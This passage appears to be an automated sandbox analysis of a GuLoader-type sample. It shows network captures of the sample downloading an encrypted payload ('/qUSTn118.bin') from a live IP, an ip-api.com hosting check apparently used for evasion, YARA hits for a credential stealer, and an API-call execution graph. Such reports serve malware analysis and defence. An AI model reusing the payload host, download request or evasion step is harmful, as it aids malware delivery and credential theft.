                            Jul 3, 2024 14:02:45.964153051 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964167118 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964193106 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964205980 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964216948 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964216948 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964221954 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964234114 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964245081 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964257002 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964268923 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964314938 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964327097 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964335918 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:45.964346886 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964346886 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964368105 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964368105 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964442015 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964442015 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:45.964570045 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.184523106 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184572935 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184612989 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184643030 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184679031 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184705973 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184720993 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.184732914 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184760094 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184787035 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184814930 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184847116 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184874058 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184885979 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.184900999 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184916973 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.184917927 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.184927940 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.184948921 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185015917 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185074091 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185153961 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185251951 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185288906 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185317039 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185350895 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185372114 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185373068 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.185455084 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185455084 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.185539961 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186070919 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186101913 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186129093 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186156988 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186184883 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186230898 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186244011 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186280012 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186306953 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186321020 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186346054 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186372995 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186399937 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186425924 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186454058 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186467886 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186491966 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186520100 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186547041 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186573982 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186579943 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186609983 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186633110 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186647892 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186675072 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186697960 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186712027 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186738968 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186749935 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186749935 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186780930 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186811924 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186837912 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186865091 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186880112 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186880112 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186907053 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186928034 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.186943054 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186970949 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.186976910 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187006950 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187026978 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187045097 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187072039 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187077045 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187108994 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187139988 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187166929 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187179089 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187179089 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187208891 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187238932 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187266111 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187278032 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187278032 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187330961 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187335014 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187371016 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187401056 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187423944 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187423944 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187441111 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187469006 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187496901 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187521935 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187521935 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187536955 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187565088 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187570095 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187601089 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187619925 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187638998 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187665939 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187689066 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187716007 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187741995 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187768936 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187796116 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187802076 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187828064 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:02:46.187868118 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.187947035 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:46.188102007 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:02:47.930686951 CEST4984380192.168.11.30208.95.112.1
                            Jul 3, 2024 14:02:48.066569090 CEST8049843208.95.112.1192.168.11.30
                            Jul 3, 2024 14:02:48.066987038 CEST4984380192.168.11.30208.95.112.1
                            Jul 3, 2024 14:02:48.067605019 CEST4984380192.168.11.30208.95.112.1
                            Jul 3, 2024 14:02:48.201086998 CEST8049843208.95.112.1192.168.11.30
                            Jul 3, 2024 14:02:48.247817039 CEST4984380192.168.11.30208.95.112.1
                            Jul 3, 2024 14:03:20.657516956 CEST8049843208.95.112.1192.168.11.30
                            Jul 3, 2024 14:03:20.657737970 CEST4984380192.168.11.30208.95.112.1
                            Jul 3, 2024 14:03:32.442104101 CEST8049843208.95.112.1192.168.11.30
                            Jul 3, 2024 14:04:34.614667892 CEST4984280192.168.11.30185.222.58.113
                            Jul 3, 2024 14:04:34.836252928 CEST8049842185.222.58.113192.168.11.30
                            Jul 3, 2024 14:04:34.836548090 CEST4984280192.168.11.30185.222.58.113
                            TimestampSource PortDest PortSource IPDest IP
                            Jul 3, 2024 14:02:47.804864883 CEST5675053192.168.11.301.1.1.1
                            Jul 3, 2024 14:02:47.924290895 CEST53567501.1.1.1192.168.11.30
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 3, 2024 14:02:47.804864883 CEST192.168.11.301.1.1.10x9bceStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 3, 2024 14:02:47.924290895 CEST1.1.1.1192.168.11.300x9bceNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            • 185.222.58.113
                            • ip-api.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.11.3049842185.222.58.113809536C:\Users\user\Desktop\1ppvR5VRT6.exe
                            TimestampBytes transferredDirectionData
                            Jul 3, 2024 14:02:44.849066019 CEST171OUTGET /qUSTn118.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                            Host: 185.222.58.113
                            Cache-Control: no-cache
                            Jul 3, 2024 14:02:45.071357012 CEST1289INHTTP/1.1 200 OK
                            Content-Type: application/octet-stream
                            Last-Modified: Thu, 27 Jun 2024 08:31:03 GMT
                            Accept-Ranges: bytes
                            ETag: "d7326596cc8da1:0"
                            Server: Microsoft-IIS/8.5
                            Date: Wed, 03 Jul 2024 12:02:43 GMT
                            Content-Length: 242240
                            Data Raw: 5c 74 26 38 5f 43 d4 53 76 7a 48 e8 e4 8e 15 54 56 2b f5 b5 aa 31 9b 88 66 35 3a 3b 9e 4e eb 83 17 39 40 58 ef 94 0b 58 6f 9d 2b dc bf 39 a6 25 9f b0 9a fb 4d 93 9f 6d 1a ad a4 02 21 cd 8d 8a f3 a5 dd 8e b1 cd 9e 0a 2d 8d 05 71 da cf 41 28 cd 26 59 fd bf 48 b7 89 5f 08 c0 7e a2 a6 df a5 9e 45 7f a4 d9 58 a8 99 ad a1 ce 79 7e 1f e4 c3 fe 03 05 73 ab 0e 0b c8 9f d7 c4 9c ed b3 ac da 7e 80 47 f5 b2 2c b3 5d b0 44 da 3b b5 f5 d5 b1 6b a3 91 46 65 e0 bd 4e 78 5e e8 a3 8c b8 de 9a fb c7 af 30 82 87 3d 5c 1f 97 4f d1 da 12 44 56 e5 45 77 b1 71 e7 a8 48 4a c1 47 e3 dc a5 1a c3 d7 ee a5 d7 6a ce ce 5f 28 b8 f7 6d c9 74 57 b9 77 4b 89 af ba 81 62 04 b7 b7 c5 64 62 11 e5 39 55 58 db 7d 72 5f 0f 39 8f df 75 78 f9 8c fc 44 d5 14 20 cd b9 68 38 65 54 42 ec 6a a7 0b 49 94 68 c4 c1 de d6 d8 fe 8d ad e0 aa b6 fc 50 19 5b d7 c4 ed 61 d1 7a f3 06 9a 55 81 20 11 a9 83 86 06 33 96 e9 88 f0 04 1f 1e 4f f5 57 6e 1d da d3 b1 46 4d 41 4e 4b 18 bb 44 b8 10 50 f0 8e cc ce 31 f9 f4 03 82 2f d1 29 b2 4c 29 b7 4b 4c 56 1d 59 d8 [TRUNCATED]
                            Data Ascii: \t&8_CSvzHTV+1f5:;N9@XXo+9%Mm!-qA(&YH_~EXy~s~G,]D;kFeNx^0=\ODVEwqHJGj_(mtWwKbdb9UX}r_9uxD h8eTBjIhP[azU 3OWnFMANKDP1/)L)KLVY`g7WpznU1]@"]=khl}/zG@3y2qV/EFPLR#y/QeYUy7nSn!)te.]NNip*dMz*gr^J-[T.BH^C@AzZ"8xXpnW.rNy6M?YY*=,zD]\!t}?ggD{1$.Bq/17:ZsZ)?Md^&ELW-MN^Bktr|(;jv(_Y1/bG?Q?13,CC<bo%6xv}fEwFJ!n8{Rb>>46WQ}jKk3L\73EQs6A2!xh]N,"_$y5"Y&N%F?~'Q}^e`"os|/I@E,\?rkm(|FNA= "HT+R{lSVN89E [TRUNCATED]
                            Jul 3, 2024 14:02:45.071486950 CEST1289INData Raw: af e5 b2 3a 9d dd 51 e9 c2 f8 25 47 37 b9 30 42 34 13 5f e7 e8 80 5e 4d 50 90 68 1a 51 c0 9d 06 5e 8c 94 d3 a6 f5 ce 5d 22 63 73 25 2d 3d 3a be c7 b4 4d 72 86 44 dd 88 a7 cf 20 df 9d e9 0c d6 f6 df bb 66 ad ba ad 70 b4 87 4a 48 91 c3 af 8e 60 77
                            Data Ascii: :Q%G70B4_^MPhQ^]"cs%-=:MrD fpJH`wE`Y]lc 23)&3nT{X0=&p!IN-?JWZ&@>NSn00ZAI`?s[o'(u,yJh\QWX0xh~
                            Jul 3, 2024 14:02:45.071501970 CEST1289INData Raw: 30 f0 11 c7 63 73 5c d5 33 8c eb 07 9b f5 c9 f8 a9 83 90 b0 c9 5c 38 ef 39 c0 df 5a 26 ea d5 93 ad b4 8c a3 a6 64 94 1c f0 0d 6c de 12 e1 95 18 f1 46 ef 0b ab 30 1c 52 13 07 d6 4d fe 9a c9 9f 0a 2f a7 1b 73 5e ac 41 28 71 0c 7b ff bc 35 2b 89 1f
                            Data Ascii: 0cs\3\89Z&dlF0RM/s^A(q{5+4O}bryx5s$)YmrP4l<.[2?#s9Y@^G8:&w~Ueraf9Qzq"9!\2D!Gx||
                            Jul 3, 2024 14:02:45.071516037 CEST1289INData Raw: fb b2 9c 90 b2 93 ff a6 92 78 d4 85 f3 1c d2 ca d0 17 8f de 16 3b 31 cb bd 0b d6 b0 f1 a5 f9 cf 2e 45 f5 48 36 15 dc 23 f2 e3 ba 17 76 8c 00 0d d6 24 02 a5 42 6a eb 65 e1 df d8 f2 c3 87 af 8f c9 24 b4 24 5f 80 5b 91 29 cb 77 2a 50 77 4b 8d 85 44
                            Data Ascii: x;1.EH6#v$Bje$$_[)w*PwKDN@DPyXa:\vx9/#zf)ij7lPqtxF 5ITFlWaoHn+G})4vW]B7Yyxo3 @# _
                            Jul 3, 2024 14:02:45.297693968 CEST1289INData Raw: b4 6c c4 c1 de 28 d9 c7 87 a9 e0 aa b6 dc 51 19 5b d7 1a e7 61 d1 78 0d 0a 9a 55 a1 2c 13 a9 c3 fd 07 0a 83 e9 88 e0 3c 1a 1e 4f e5 6f 3c f3 25 2c 9b 46 4d 41 4d 7b 1e bb b4 b8 10 50 f2 8e cc df 4d 3f f7 03 cd d1 df 2b b2 94 f6 b7 0d 49 56 e3 55
                            Data Ascii: l(Q[axU,<Oo<%,FMAM{PM?+IVU`gpsU]#}]1khL}/uztg@3|6&]SFbl\LX2yd]eyV)7nY!Ye-dD*QYH3z~4]7
                            Jul 3, 2024 14:02:45.297709942 CEST1289INData Raw: 83 b5 2b 09 27 90 7a 9d c1 a4 c1 c5 81 7b e5 38 4c 37 a6 e9 78 e7 e9 32 0f d5 1d de 52 5d e9 d2 db b9 8f 48 46 91 84 af 84 50 4c ac 22 a4 dc 13 09 92 21 13 79 e1 b4 3e 51 65 f9 fb ab cf b4 ac 21 8d 37 6e 53 5e df ab 21 23 aa eb 60 f4 78 b7 86 5d
                            Data Ascii: +'z{8L7x2R]HFPL"!y>Qe!7nS^!#`x]>>Ah?*`?8]?EeZT.Hf1h^zZ*(qtXpHf[.rNey[*8.zP\<#O}>NdwD{g$
                            Jul 3, 2024 14:02:45.297821045 CEST1289INData Raw: e2 b6 0a fe e3 1d 0d 2e 5b 8b aa 22 41 ed 86 4f f0 70 98 4c e6 15 f4 99 c1 09 e5 05 eb 80 60 40 7a 5a 20 ef 16 cf 71 f4 ac 58 db 58 cb c1 fb 7e ea 6e 98 a9 a9 ee fe a4 be 2e 85 8c f4 ef 3a 6a 91 4e bb 87 3a 4c 8d 9a 9d af 9f 93 ef e1 ee e6 99 b3
                            Data Ascii: .["AOpL`@zZ qXX~n.:jN:L=.z81 s}gH{1${.BM/;9zsZ%>h jRN-]Ut;:hI}&:Mvv\E6L_D`QH2@Ms
                            Jul 3, 2024 14:02:45.297835112 CEST1289INData Raw: bc 1c 28 c2 b4 71 96 d5 0f 39 37 3a e1 a4 19 bd 1f af fe d2 f4 e0 30 73 5a 1f 29 c1 f5 af 6c 20 1a 6a a8 70 98 05 a7 f0 90 32 ad fb 8e 5d fd 56 ed c0 40 03 e9 e7 aa 39 3b 11 0f c4 b3 01 7a f8 49 fa 0c d0 31 d9 e5 d4 dc 4d 00 1e d5 86 db 47 56 b9
                            Data Ascii: (q97:0sZ)l jp2]V@9;zI1MGVv^E:lT_F1IH2msO!b5WW_Bj^A3PBa(P%L1``BHn_S|'t@)?x"Iax/A2VQLMN, _:?s
                            Jul 3, 2024 14:02:45.297848940 CEST1289INData Raw: d1 6c b9 0c bc fd 07 55 cd 42 13 9e 27 90 5e a4 fb 3f 6c d6 97 0b d0 4b 61 61 bb 6e 78 25 4c e5 14 d3 f5 7f 8e 0d 12 69 bd eb 00 6d e2 c1 d2 1e 77 d1 53 53 76 57 64 ef 00 07 ee 88 79 40 d7 35 f1 95 ee 86 5e 6d ce d9 d2 88 4e d9 9f 79 b7 ca 88 89
                            Data Ascii: lUB'^?lKaanx%LimwSSvWdy@5^mNy5HK!x]] =_J'o5tbS@f+Qq^e`EE7:zIxw-e0kO=DjG[X-/Ecz&N-e&%^)ux2CB
                            Jul 3, 2024 14:02:45.297861099 CEST1289INData Raw: 93 93 8e dc 0c a0 59 06 4f cb bf 25 b8 bf 2a b4 3f 13 27 f4 7b 3f d6 7b 67 8e 16 65 60 81 10 ca 7c 62 e0 9a d0 c9 37 02 02 01 2f 69 f6 f4 9f 79 42 76 14 cd 45 ba eb 18 40 17 76 78 f1 0a 1e 45 4f 30 f6 4a 5b c1 f7 7b 24 be 54 2d d1 22 49 6f 80 16
                            Data Ascii: YO%*?'{?{ge`|b7/iyBvE@vxEO0J[{$T-"IozOw=&%w)U&yoEkYTIZ4:24jFUzMdvY|QM]h\;a}>o?p!R+$-=:@]qB !$L
                            Jul 3, 2024 14:02:45.297872066 CEST1289INData Raw: 12 34 07 f8 b5 c7 1a 3f ca b6 b4 e3 6b d8 86 92 66 54 d9 d5 7a e8 96 31 ec 40 aa 01 54 af 6c 90 44 8a ca 05 1f 17 4d 8a 15 fc 9f e4 df 00 6e 48 8f 2f eb db 05 87 a3 51 16 62 f8 da 47 b7 13 ab 72 63 7d 4d 87 84 e5 73 39 3f a1 3a 7f 22 af f1 8e 35
                            Data Ascii: 4?kfTz1@TlDMnH/QbGrc}Ms9?:"5-P"-;pUW!P]B>KXYdtFF$^d"m?+TTS;|$O\-}IO&9>|AhD!0PMzFq/


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.11.3049843208.95.112.1809536C:\Users\user\Desktop\1ppvR5VRT6.exe
                            TimestampBytes transferredDirectionData
                            Jul 3, 2024 14:02:48.067605019 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                            Host: ip-api.com
                            Connection: Keep-Alive
                            Jul 3, 2024 14:02:48.201086998 CEST174INHTTP/1.1 200 OK
                            Date: Wed, 03 Jul 2024 12:02:47 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 5
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 74 72 75 65 0a
                            Data Ascii: true


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:5
                            Start time:08:02:13
                            Start date:03/07/2024
                            Path:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\1ppvR5VRT6.exe"
                            Imagebase:0x400000
                            File size:864'817 bytes
                            MD5 hash:12B29055A6B47A95B2FE8BCD19859C70
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.96966764637.0000000006451000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:08:02:29
                            Start date:03/07/2024
                            Path:C:\Users\user\Desktop\1ppvR5VRT6.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\1ppvR5VRT6.exe"
                            Imagebase:0x400000
                            File size:864'817 bytes
                            MD5 hash:12B29055A6B47A95B2FE8BCD19859C70
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.101765393244.0000000036D85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Reset < >

                              Execution Graph

                              Execution Coverage:23.9%
                              Dynamic/Decrypted Code Coverage:13.8%
                              Signature Coverage:20.2%
                              Total number of Nodes:1519
                              Total number of Limit Nodes:50
                              execution_graph 5142 10001000 5145 1000101b 5142->5145 5152 100014bb 5145->5152 5147 10001020 5148 10001024 5147->5148 5149 10001027 GlobalAlloc 5147->5149 5150 100014e2 3 API calls 5148->5150 5149->5148 5151 10001019 5150->5151 5154 100014c1 5152->5154 5153 100014c7 5153->5147 5154->5153 5155 100014d3 GlobalFree 5154->5155 5155->5147 4028 4025c4 4029 402a9f 17 API calls 4028->4029 4032 4025ce 4029->4032 4030 40263c 4032->4030 4033 40263e 4032->4033 4035 40264e 4032->4035 4037 405caa ReadFile 4032->4037 4039 405ff7 wsprintfA 4033->4039 4035->4030 4036 402664 SetFilePointer 4035->4036 4036->4030 4038 405cc8 4037->4038 4038->4032 4039->4030 4068 402245 4069 402ac1 17 API calls 4068->4069 4070 40224b 4069->4070 4071 402ac1 17 API calls 4070->4071 4072 402254 4071->4072 4073 402ac1 17 API calls 4072->4073 4074 40225d 4073->4074 4083 40639c FindFirstFileA 4074->4083 4077 402277 lstrlenA lstrlenA 4079 4051c0 24 API calls 4077->4079 4080 4022b3 SHFileOperationA 4079->4080 4081 40226a 4080->4081 4082 402272 4080->4082 4086 4051c0 4081->4086 4084 4063b2 FindClose 4083->4084 4085 402266 4083->4085 4084->4085 4085->4077 4085->4081 4087 4051db 4086->4087 4096 40527e 4086->4096 4088 4051f8 lstrlenA 4087->4088 4089 4060bb 17 API calls 4087->4089 4090 405221 4088->4090 4091 405206 lstrlenA 4088->4091 4089->4088 4092 405234 4090->4092 4093 405227 SetWindowTextA 4090->4093 4094 405218 lstrcatA 4091->4094 4091->4096 4095 40523a SendMessageA SendMessageA SendMessageA 4092->4095 4092->4096 4093->4092 4094->4090 4095->4096 4096->4082 5163 4028c5 5164 402a9f 17 API calls 5163->5164 5165 4028cb 5164->5165 5166 402900 5165->5166 5168 402716 5165->5168 5169 4028dd 5165->5169 5167 4060bb 17 API calls 5166->5167 5166->5168 5167->5168 5169->5168 5171 405ff7 wsprintfA 5169->5171 5171->5168 4097 401746 4098 402ac1 17 API calls 4097->4098 4099 40174d 4098->4099 4103 405c61 4099->4103 4101 401754 4102 405c61 2 API calls 4101->4102 4102->4101 4104 405c6c GetTickCount GetTempFileNameA 4103->4104 4105 405c9d 4104->4105 4106 405c99 4104->4106 4105->4101 4106->4104 4106->4105 5172 4022c7 5173 4022e1 5172->5173 5174 4022ce 5172->5174 5175 4060bb 17 API calls 5174->5175 5176 4022db 5175->5176 5177 4057b5 MessageBoxIndirectA 5176->5177 5177->5173 5178 401947 5179 402ac1 17 API calls 5178->5179 5180 40194e lstrlenA 5179->5180 5181 402577 5180->5181 4214 10002709 4215 10002759 4214->4215 4216 10002719 VirtualProtect 4214->4216 4216->4215 5185 4045ca 5186 4045f6 5185->5186 5187 404607 5185->5187 5246 405799 GetDlgItemTextA 5186->5246 5188 404613 GetDlgItem 5187->5188 5195 404672 5187->5195 5190 404627 5188->5190 5194 40463b SetWindowTextA 5190->5194 5198 405aca 4 API calls 5190->5198 5191 404756 5244 404900 5191->5244 5248 405799 GetDlgItemTextA 5191->5248 5192 404601 5193 406303 5 API calls 5192->5193 5193->5187 5199 40415a 18 API calls 5194->5199 5195->5191 5200 4060bb 17 API calls 5195->5200 5195->5244 5197 4041c1 8 API calls 5202 404914 5197->5202 5203 404631 5198->5203 5204 404657 5199->5204 5205 4046e6 SHBrowseForFolderA 5200->5205 5201 404786 5206 405b1f 18 API calls 5201->5206 5203->5194 5210 405a31 3 API calls 5203->5210 5207 40415a 18 API calls 5204->5207 5205->5191 5208 4046fe CoTaskMemFree 5205->5208 5209 40478c 5206->5209 5211 404665 5207->5211 5212 405a31 3 API calls 5208->5212 5249 406099 lstrcpynA 5209->5249 5210->5194 5247 40418f SendMessageA 5211->5247 5214 40470b 5212->5214 5217 404742 SetDlgItemTextA 5214->5217 5221 4060bb 17 API calls 5214->5221 5216 40466b 5220 406431 5 API calls 5216->5220 5217->5191 5218 4047a3 5219 406431 5 API calls 5218->5219 5227 4047aa 5219->5227 5220->5195 5222 40472a lstrcmpiA 5221->5222 5222->5217 5224 40473b lstrcatA 5222->5224 5223 4047e6 5250 406099 lstrcpynA 5223->5250 5224->5217 5226 4047ed 5228 405aca 4 